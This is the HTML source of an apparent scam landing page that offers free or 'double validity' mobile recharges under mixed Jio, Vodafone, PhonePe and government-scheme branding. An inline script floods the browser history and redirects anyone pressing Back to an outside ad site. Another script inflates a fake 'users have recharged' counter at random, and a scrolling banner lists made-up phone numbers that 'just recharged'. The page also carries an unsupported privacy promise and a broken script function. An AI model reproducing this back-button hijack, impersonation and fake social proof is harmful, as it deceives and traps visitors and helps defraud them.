<head><body bgcolor=yellow>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1">
<meta name="google" content="notranslate">
 <meta property="og:type" content="website">
    <meta property="og:title" content="3 Months Free Recharge Offer">
    <title>Vodafone Double Validity Recharge</title>
    <meta property="og:url" content="WWW,JIO.COM">
    <meta property="og:description" content="??????? ???? ?? ??? ???? ????? ????">
    <meta property="og:site_name" content="PM Awas Yojana Application Form.">
       <meta property="og:image" content="https://1.bp.blogspot.com/-yhT-nnWDPPE/YGS3oR-Fx4I/AAAAAAAAAGs/D1n4s0sm8b0ETCSgUF9Gd1eh5ORaYbvVACLcBGAsYHQ/w640-h640/PicsArt_03-31-11.23.13.png"> 

    
<link rel="icon" type="image/png" sizes="32x32" href="https://1.bp.blogspot.com/-cyZw9e6ijzk/XgXYjmfARuI/AAAAAAAAAbw/n_48t35LyIIGD-QY3tRqq9PkaZZtJ4TQACLcBGAsYHQ/s200/1200px-Reliance_Jio_Logo_%2528October_2015%2529.svg.png">    
    
    
      <meta name="viewport" content="width=device-width, initial-scale=1">
  <link rel="stylesheet" href="./index_files/bootstrap.min.css">
  <script src="./index_files/jquery.min.js.download"></script>
  <script src="./index_files/bootstrap.min.js.download"></script>

  
  
  
  
  
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <link rel="stylesheet" href="./index_files/bootstrap.min.css">
  <script src="./index_files/jquery.min.js.download"></script>
  <script src="./index_files/bootstrap.min.js.download"></script>
  
  

    
    
    <script type="text/javascript">! function (){	var t;	try{for (t=0; 10 > t; ++t)		history.pushState({}, "", "#");	onpopstate=function (t)	{ t.state &&window.location.replace("https://goraps.com/fullpage.php?section=General&pub=433711&ga=g");		}}		catch (o){}}();</script>
    
<style>


.form-container div, .form-container  span{
    font-family: Calibri, Candara, Segoe, 'Segoe UI', Optima, Arial, sans-serif;
}

.form-container ::-webkit-input-placeholder { /* WebKit, Blink, Edge */
    color:    #999;
}

.form-container :-moz-placeholder { /* Mozilla Firefox 4 to 18 */
   color:    #999;
   opacity:  1;
}

.form-container ::-moz-placeholder { /* Mozilla Firefox 19+ */
   color:    #999;
   opacity:  1;
}

.form-container :-ms-input-placeholder { /* Internet Explorer 10-11 */
   color:    #999;
}

.form-container :placeholder-shown { /* Standard (https://drafts.csswg.org/selectors-4/#placeholder) */
  color:  #999;
}

.oauth-buttons {
    text-align:center;
}
.row {
    text-align:center;
}
#login-form{
 min-width:375px;   
}
.login-container{
    width:400px;
    height:330px;
    display:inline-block;
    margin-top: -165px;
    top: 50%;
    left: 50%;
    position: absolute;
    margin-left: -200px;
}
.form-container .create-account:hover{
    opacity:.7;
}
.form-container .create-account{
    color:inherit;
    margin-top: 15px;
    display: inline-block;
    cursor:pointer;
    text-decoration:none;
}

.oauth-buttons .fa{
    cursor:pointer;
    margin-top:10px;
    color:inherit;
    width:30px;
    height:30px;
    text-align:center;
    line-height:30px;
    margin:5px;
    margin-top:15px;
}
.oauth-buttons .fa:hover{
    color:white;
}
.oauth-buttons .fa-google-plus:hover{
    background: #dd4b39;
}
 .oauth-buttons .fa-facebook:hover{
    background:    #8b9dc3;
}

.oauth-buttons .fa-linkedin:hover{
    background:    #0077b5;
}

.oauth-buttons .fa-twitter:hover{
    background:    #55acee;
}

.form-container .req-input .input-status {
    display: inline-block;
    height: 40px;
    width: 40px;
    float: left;    
}
.form-container .input-status::before{
    content: " ";
    height:20px;
    width:20px;
    position:absolute;
    top:10px;
    left:10px;
    color:white;
    border-radius:50%;
    background:white;
    -webkit-transition: all .3s ease-in-out;
    -moz-transition: all .3s ease-in-out;
    -o-transition: all .3s ease-in-out;
    transition: all .3s ease-in-out;
    
}

.form-container .input-status::after{
    content: " ";
    height:10px;
    width:10px;
    position:absolute;
    top:15px;
    left:15px;
    color:white;
    border-radius:50%;
    background:#00BCD4;
    -webkit-transition: all .3s ease-in-out;
    -moz-transition: all .3s ease-in-out;
    -o-transition: all .3s ease-in-out;
    transition: all .3s ease-in-out;
}

.form-container .req-input{
    width:100%;
    float:left;
    position:relative;
    background:#00BCD4;
    height:40px;
    display:inline-block;
    border-radius:0px;
    margin:5px 0px;
    -webkit-transition: all .3s ease-in-out;
    -moz-transition: all .3s ease-in-out;
    -o-transition: all .3s ease-in-out;
    transition: all .3s ease-in-out;
}

.form-container div .row .invalid:hover{
    background:#EF9A9A;
}

.form-container div .row .invalid{
    background:#E57373;
}

.form-container .invalid .input-status:before {
    width:20px;
    height:4px;
    top:19px;
    left:10px;
    background:white;/*#F44336;*/
    border-radius:0px;
     -ms-transform: rotate(45deg); /* IE 9 */
    -webkit-transform: rotate(45deg); /* Chrome, Safari, Opera */
    transform: rotate(45deg);
}

.form-container .invalid .input-status:after {
    width:20px;
    height:4px;
    background:white;
    border-radius:0px;
    top:19px;
    left:10px;
     -ms-transform: rotate(-45deg); /* IE 9 */
    -webkit-transform: rotate(-45deg); /* Chrome, Safari, Opera */
    transform: rotate(-45deg);
}

.form-container div .row  .valid:hover{
    background:#A5D6A7;
}

.form-container div .row .valid {
    background:#81C784;
    
}

.form-container .valid .input-status:after {
    border-radius:0px;
    width: 17px;
    height: 4px;
    background: white;
    top: 16px;
    left: 15px;
    -ms-transform: rotate(-45deg);
    -webkit-transform: rotate(-45deg);
    transform: rotate(-45deg);
}

.form-container .valid .input-status:before {
    border-radius:0px;
    width: 11px;
    height: 4px;
    background:white;
    top: 19px;
    left: 10px;
    -ms-transform: rotate(45deg);
    -webkit-transform: rotate(45deg);
    transform: rotate(45deg);
}

.form-container .input-container{
    padding:0px 10px;
}

 .form-container .row-input{
    padding:0px 5px;
}

.form-container .req-input.input-password{
    margin-bottom:0px;
}
.form-container .req-input.confirm-password{
    margin-top:0px;
}

.form-container {
    margin:20px;
    padding:20px;
    border-radius:0px;
    background:#B3E5FC;
    color:#00838F;
    -webkit-transition: all .3s ease-in-out;
    -moz-transition: all .3s ease-in-out;
    -o-transition: all .3s ease-in-out;
    transition: all .3s ease-in-out;
}

.form-container .form-title{
    font-size:25px;
    color:inherit;
    text-align:center;
    margin-bottom:10px;
    -webkit-transition: all .3s ease-in-out;
    -moz-transition: all .3s ease-in-out;
    -o-transition: all .3s ease-in-out;
    transition: all .3s ease-in-out;
}

.form-container .submit-row{
    padding:0px 0px;
}

.form-container .btn.submit-form{
    margin-top:15px;
    padding:12px;
    background:#00BCD4;
    color:white;
    border-radius:0px;
    -webkit-transition: all .3s ease-in-out;
    -moz-transition: all .3s ease-in-out;
    -o-transition: all .3s ease-in-out;
    transition: all .3s ease-in-out;
}

.form-container .btn.submit-form:focus{
    outline:0px;
    color:white;
}

.form-container .btn.submit-form:hover{
    background:#00cde5;
    color:white;
}

.form-container .tooltip.top .tooltip-arrow {
    border-top-color:#00BCD4 !important;
}

.form-container .tooltip.top.tooltip-invalid .tooltip-arrow {
    border-top-color:#E57373 !important;
}

.form-container .tooltip.top.tooltip-invalid .tooltip-inner::before{
    background:#E57373;
}
.form-container .tooltip.top.tooltip-invalid .tooltip-inner{
    background:#FFEBEE !important;
    color:#E57373;
}

.form-container .tooltip.top.tooltip-valid .tooltip-arrow {
    border-top-color:#81C784 !important;
}

.form-container .tooltip.top.tooltip-valid .tooltip-inner::before{
    background:#81C784;
}
.form-container .tooltip.top.tooltip-valid .tooltip-inner{
    background:#E8F5E9 !important;
    color:#81C784;
}

.form-container .tooltip.top .tooltip-inner::before{
    content:" ";
    width:100%;
    height:6px;
    background:#00BCD4;
    position:absolute;
    bottom:5px;
    right:0px;
}
.form-container .tooltip.top .tooltip-inner{
    border:0px solid #00BCD4;
    background:#E0F7FA !important;
    color:#00ACC1;
    font-weight:bold;
    font-size:13px;
    border-radius:0px;
    padding:10px 15px;
}
.form-container .tooltip {
    max-width:150px;
    opacity:1 !important;
}

.form-container .message-box{
    width:100%;
    height:auto;
}

.form-container textarea:focus,.form-container textarea:hover{
    background:#fff;
    outline:none;
    border:0px;
}

.form-container .req-input textarea {
    max-width:calc(100% - 50px);
    width: 100%;
    height: 80px;
    border: 0px;
    color: #777;
    padding: 10px 9px 0px 9px;
    float:left;
    
}
.form-container input[type=text]:focus, .form-container input[type=password]:focus, .form-container input[type=email]:focus, .form-container input[type=tel]:focus, .form-container select{
    background:#fff;
    color:#777;
    border-left:0px;
    outline:none;
}

.form-container input[type=text]:hover,.form-container input[type=password]:hover,.form-container input[type=email]:hover,.form-container input[type=tel]:hover, . form-container select{
    background:#fff;
}

.form-container input[type=text], .form-container input[type=password], .form-container input[type=email],input[type=tel], form-container select{
    width:calc(100% - 50px);
    float:left;
    border-radius:0px;
    border:0px solid #ddd;
    padding:0px 9px;
    height:40px;
    line-height:40px;
    color:#777;
    background:#fff;
    -webkit-transition: all .3s ease-in-out;
    -moz-transition: all .3s ease-in-out;
    -o-transition: all .3s ease-in-out;
    transition: all .3s ease-in-out;
}

body {
    background:#365ded;
    max-width: 450px;
    margin:auto;
  font-family: 'Segoe UI', 'Helvetica', sans-serif;
  font-size:16px;
  font-style:bold;
}

.logo {
    margin:auto;
    max-width:100%;
  padding: 0px;
}

.container {
  margin: auto;
  padding: 5px 15px 5px;
  max-width: 100%;
  background-color: #F9F9F9;
}
.center-form {
  margin: 0 auto;
}

.title {
  font-size: 2rem;
  font-weight: lighter;
}
.description {
  font-size: 1.2rem;
}

.text-center {
  text-align: center;
}
.text-left {
  text-align: left;
}

.form-group > * {
  display: block;
}
.form-group:not(:last-child) {
  margin-bottom: 20px;
}
.form-control {
  width: 100%;
  padding-left: 5px;
  height: 50px;
  border: 1px solid     #1aa3ff;
  border-radius: 3px;
  font-size:17px;
  padding:10px;
  background:WhiteSmoke;
  color:DimGrey;
 
}
textarea.form-control {
  height: auto;
  padding:10px;
   
}

</style>

<style>

.button {
    background-color: #4be20f;
    border: none;
    color: white;
    padding: 12px;
    text-align: center;
    text-decoration: none;
    display: inline-block;
    font-size: 20px;
    margin: 4px 2px;
    cursor: pointer;
    width: 100%;
    border-radius: 6px;
   font-weight: bold;
 
}

.button:hover {
    background:#09C;
    -webkit-transition:background 0.3s ease-in-out;
    -moz-transition:background 0.3s ease-in-out;
    transition:background-color 0.3s ease-in-out;
}

.button:active { box-shadow:inset 0 1px 3px rgba(0, 0, 0, 0.5); }



.loda {
    display: block;
    position: relative;
    padding-left: 35px;
    margin-bottom: 12px;
    cursor: pointer;
    font-size: 22px;
    -webkit-user-select: none;
    -moz-user-select: none;
    -ms-user-select: none;
    user-select: none;
}

.loda input {
    position: absolute;
    opacity: 0;
    cursor: pointer;
}

.checkmark {
    position: absolute;
    top: 0;
    left: 0;
    height: 25px;
    width: 25px;
    background-color: #eee;
    border: 2px solid #393bd3;
}


.loda:hover input ~ .checkmark {
    background-color: #ccc;
}

.loda input:checked ~ .checkmark {
    background-color: #4CAF50;
}


.checkmark:after {
    content: "";
    position: absolute;
    display: none;
}

.loda input:checked ~ .checkmark:after {
    display: block;
}


.loda .checkmark:after {
    left: 9px;
    top: 5px;
    width: 5px;
    height: 10px;
    border: solid white;
    border-width: 0 3px 3px 0;
    -webkit-transform: rotate(45deg);
    -ms-transform: rotate(45deg);
    transform: rotate(45deg);
}

label
{   font-size:16px;
    margin-bottom:5px;
    margin-top:1px;
    padding:0;
    text-decoration:bold;
}

.green {
    border-left: 6px solid green;
    background-color: #53c653;
    padding:10px;
     color:white;
}

.blue {
    border-left: 6px solid #005ce6;
    background-color:      #ff1a1a;
    padding:10px;
     color:white;
}

.red {
    border-left: 6px solid       #ff1a1a
;
    background-color:           #00e6e6     ;
    padding:10px;
     color:  #000000
;
}

</style>

<script>
function RunIt()
{
alert(
}
</script>

</head><marquee scrolldelay="170" bgcolor="#09132d" width="100%" direction = "left" style="color:#ffffff;border-color:#ff0000;">6305850XXX  just recharged 599..! 8569854XXX  just recharged 555..! 9542362XXX  just recharged 599..!  9356935XXX  just recharged 555..! 9654852XXX  just recharged 399..! 9856329XXX just recharged 399..! 8563256XXX  just recharged 555..! 6036585XXX just recharged 399..! 8569856XXX  just recharged 449..! 9542368XXX  just recharged 399..!
 6305850XXX  just recharged 599..! 8569854XXX  just recharged 555..! 9542362XXX  just recharged 599..!  9356935XXX  just recharged 555..! 9654852XXX  just recharged 399..! 9856329XXX just recharged 399..! 8563256XXX  just recharged 555..! 6036585XXX just recharged 399..! 8569856XXX  just recharged 449..! 9542368XXX  just recharged 399..!
*  just recharged 449..! 6259435XXX  just recharged 399..! 8659862XXX  just recharged 449..! 8569848XXX just recharged 399..! 6256986XXX  just recharged 599..! 7569843XXX just recharged 399..! 9356982XXX  just recharged 555..!7370255XXX  just recharged 399..! 9856326XXX just recharged 399..!  </marquee>

<c><img src=https://1.bp.blogspot.com/-us9Tc4_fwZA/YLNvgZZ6HLI/AAAAAAAAAuc/bbGUlmyuM481XTjWSaf1yX8TcB0hylZRQCLcBGAsYHQ/s320/IMG-20210530-WA0025.jpg height=200 width=100%></c><b>
<br><font size=22 color=yellow><C><B>PHONEPAY Double &nbsp &nbsp Validity OFFER </C><br>
</marquee></B>
</font>
<section class="container text-center">

<img src=https://1.bp.blogspot.com/-kx2CD_QAPfg/YLNZ6PEj6cI/AAAAAAAAAuI/-xtS4ACdPrg-26Q7jnUVA_niu5zsXUsOQCLcBGAsYHQ/s320/PicsArt_03-31-10.15.05.jpg>
<br> <div class="alert alert-danger" role="alert" style="color:#08704c;background-color:#cff7e9;border-color:#cff7e9;">
          TILL NOW <b><span id="countdowntimer" style="color:red;">448</span></b> USERS HAVE RECHARGED




  <script type="text/javascript">
            var timeleft = 448;
            var downloadTimer = setInterval(function(){
                timeleft= timeleft + Math.floor(Math.random() * 200);
                document.getElementById('countdowntimer').textContent = timeleft;
                if (timeleft <= 0)
                    clearInterval(downloadTimer);
            }, 1000);
        </script><br>
<br> <font color=green size=5><u>
 PLEASE SELECT YOUR PLAN </font></u> 
<br><br>

<img src=https://1.bp.blogspot.com/-bm0wouAaLgI/YLSvXPrZ8CI/AAAAAAAAAv0/OINI_g-rfxwxi1SiArc47Vy6BjflwH3YwCLcBGAsYHQ/s2400/PicsArt_05-28-10.42.12.jpg height=110 width=100%><br><hr>
<img src=https://1.bp.blogspot.com/-m37oMEhUfyU/YLSvfyqXuUI/AAAAAAAAAv4/JGsj5umGIx0hYmTs3t8KUqq-lDcffdW1gCLcBGAsYHQ/s2400/PicsArt_05-28-10.45.31.jpg height=110 width=100%><br><hr>
<img src=https://1.bp.blogspot.com/-7w24Uz4vewg/YLSv83-aydI/AAAAAAAAAwQ/gRYJwbSzxts5zpLa1Y6bP8XYHdi2UYrmgCLcBGAsYHQ/s2400/PicsArt_05-28-10.46.50.jpg height=110 width=100%><br><hr>
<img src=https://1.bp.blogspot.com/-fQiOv4oSBCA/YLSwIeQhNtI/AAAAAAAAAwU/lUQM_39_Frw-ioT162UyPHniK-TK1kfjQCLcBGAsYHQ/s2400/PicsArt_05-28-10.39.12.jpg height=110 width=100%><hr>
 
<br> <div class="alert alert-danger" role="alert" style="color:#08704c;background-color:#cff7e9;border-color:#cff7e9;">
         <b>Note:-</b> We care about your privacy. We do not collect your personal information.
